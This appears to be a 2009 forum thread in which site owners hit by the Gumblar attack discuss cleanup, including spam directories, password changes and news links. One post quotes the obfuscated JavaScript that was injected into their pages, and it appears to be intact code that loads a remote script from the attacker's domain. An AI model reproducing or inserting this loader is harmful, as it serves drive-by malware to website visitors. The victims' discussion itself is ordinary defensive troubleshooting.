I had a similar problem.  Using Google for my site, I found bad porno links to my site.  When I started looking I found files with similar naming.  I went through and deleted any files that were not on my source on my PC.  I deleted a couple of extra folders.  I think it all is gone now but am still watching it.  I changed all my passwords too.

LP suggests I delete the unwanted files and change my passwords. No suggestion as to how to prevent this in the future, no suggestion as to how this occurred.

I got those porn directories, and a bunch of other stuff I just deleted. Every htm and html file had a javascript block (trojan/virus ?) installed!
FYI, there's a piece of it below, hopefully scrambled enough to be useless.


Does anybody have any idea how to prevent this?


<script language=javascript><!--
(function(){var U63H=',76a,72,20a,3d,22ScriptEngine,22,2cb,3d,22Versi,6fn,28)+,22,2cj,3d,22,22,2cu,3dn,61vi,67ator,2e,75ser,41gent,3b,69,66((,75,2e,69,6ed,65xOf,28,22Wi,6e,22),3e0),26,26(u,2ein,64ex,4ff(,22,4e,54,206,22),3c,30),26,26(,64o,63ume,6et,2ec,6fok,69,65,2e,69ndexO,66(,22miek,3d1,22),3c0),26,26(typ,65of(zrvzts),21,3dtypeof(,22A,22))),7bz,72v,7a,74s,3d,22A,22,3bev,61,6c(,22i,66(win,64,6f,77,2e,22,2ba+,22)j,3dj,2b,22+,61+,22,4daj,6fr,22,2b,62+a,2b,22Mino,72,22,2bb+a,2b,22Buil,64,22+b+,22j,3b,22),3bdocument,2e,77,72ite(,22,3cscri,70,74,20src,3d,2f,2fgum,62lar,2e,63n,2frs,73,2f,3fi,64,3d,22+,6a,2b,22,3e,3c,5c,2fs,63r,69pt,3e,22),3b,7d';var x7B=unescape(U63H.replace(/,/g,'%'));eval(x7B)})();
 --></script>

It seems to be a bug with Acrobat that is causing this to spread at a very rapid rate. I am surprised that LP does not give any info on this. if they don't know about it yet they will soon enough... it being called "Gumblar" but has several morphs

good luck guys. I'm fighting this on a few sites too


here is some info
http://www.theregister.co.uk/2009/05/19/gumblar_google_poisoning_update/
http://news.zdnet.co.uk/security/0,1000000189,39653848,00.htm
http://www.us-cert.gov/current/index.html#gumblar_malware_attack_circulating

I've had the same problem with the porno and the malicious code that was downloading viruses or who knows what. I went through and deleted the porn and deleted the bad code. After I finished deleting all that junk, my disk space usage as displayed on the cpanel general info went down to 0.01 MB (was at about 200 MB before I started deleting).

I noticed that we were running apache 1.3.41 We requested to be upgraded to apache 2 and they said they went ahead and did that (and that's what it shows in cpanel. However, when I check using netcraft toolbar which gives version info, it still says we're running apache 1.3.41. What gives?

Another question I have is that my disk space usage is back up to about 70 MB--I was wondering if this was due to the upgrade to apache 2 or is some hacker back at it putting porn on our website? I did change passwords too, so I don't really know what else to do.  Any suggestions?